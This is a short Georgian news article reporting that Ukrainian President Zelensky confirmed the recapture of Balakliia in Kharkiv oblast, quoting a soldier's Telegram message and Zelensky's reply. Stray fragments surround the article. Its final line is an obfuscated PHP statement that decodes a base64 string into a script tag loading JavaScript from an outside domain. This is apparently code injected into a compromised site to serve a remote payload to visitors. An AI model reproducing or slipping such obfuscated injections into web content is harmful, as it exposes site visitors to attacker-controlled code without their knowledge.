celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ ქალაქ ბალაკლეას გათავისუფლება დაადასტურა. ვოლოდიმირ ზელენსკიმ „ტელეგრამის“ საკუთარ გვერდზე გამოაქვეყნა უკრაინელი სამხედროების მიერ ბალაკლეაში ჩაწერილი მიმართვა.
 
„ბატონო პრეზიდენტო, ქალაქი ბალაკლეა ხარკოვის ოლქში ჩვენს კონტროლს დაექვემდებარა. ბრძანება შესრულებულია. რუსეთის საოკუპაციო ძალები გავიდნენ“, – აცხადებს უკრაინელი სამხედრო მიმართვაში.
 
„ყველაფერი თავის ადგილზეა. უკრაინის დროშა არის თავისუფალ უკრაინულ ქალაქში, თავისუფალი უკრაინული ცის ქვეშ. ამაყი ვარ, გაუფრთხილდით თავს, გამარჯვებისკენ“, – აცხადებს ვოლოდიმირ ზელენსკი.
 
შეგახსენებთ, რომ 8 სექტემბერს უკრაინელმა სამხედროებმა გამოაქვეყნეს ფოტოები ქალაქ ბალაკლეადან, რომელიც რუსეთის არმიას ექვსი თვის განმავლობაში ჰქონდა ოკუპირებული. ბალაკლეას გათავისუფლების შესახებ ცნობები ოფიციალურად ამ დრომდე არ ყოფილა. 
497
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");